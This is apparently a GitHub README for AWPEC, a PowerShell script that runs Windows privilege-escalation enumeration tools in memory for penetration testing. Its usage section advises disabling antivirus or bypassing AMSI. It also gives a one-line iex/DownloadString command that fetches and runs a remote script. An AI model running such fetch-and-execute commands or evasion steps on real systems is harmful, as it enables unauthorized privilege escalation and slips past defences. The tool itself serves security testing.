Haxxnet / AWPEC

Automated Windows Privilege Escalation Checks

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

πŸ”₯ AWPEC πŸ”₯

Automated Windows Privilege Escalation Checks

PowerShell script that automates the tedious tasks of Windows Privilege Escalation


Buy Me A Coffee

πŸ’Ž Features

AWPEC runs the following privilege escalation tools in memory:

  • PowerUp
  • Seatbelt
  • PrivescCheck
  • WinPEAS

It also supports running ADRecon and auditing the results if you find yourself within an Active Directory domain context.

πŸŽ“ Usage

Since the AWPEC PowerShell script relies on various 3rd party tools, which are known for being flagged by AV, we have to either disable antivirus or actively bypass AMSI. Furthermore, as we utilize PowerSharpPack, which reflectively loads C# code, we must ensure to bypass AMSI .NET as well. A basic AMSI PS bypass is not sufficient!

So open a low-priv PowerShell terminal session, bypass AMSI (PS + .NET) and then run the PS script:

# run the AWPEC script
iex(new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Haxxnet/AWPEC/main/Invoke-AWPEC.ps1')

πŸ’Ž Acknowledgment & Credits

Many thanks to the following individuals:

About

Automated Windows Privilege Escalation Checks


Languages

Language:PowerShell 100.0%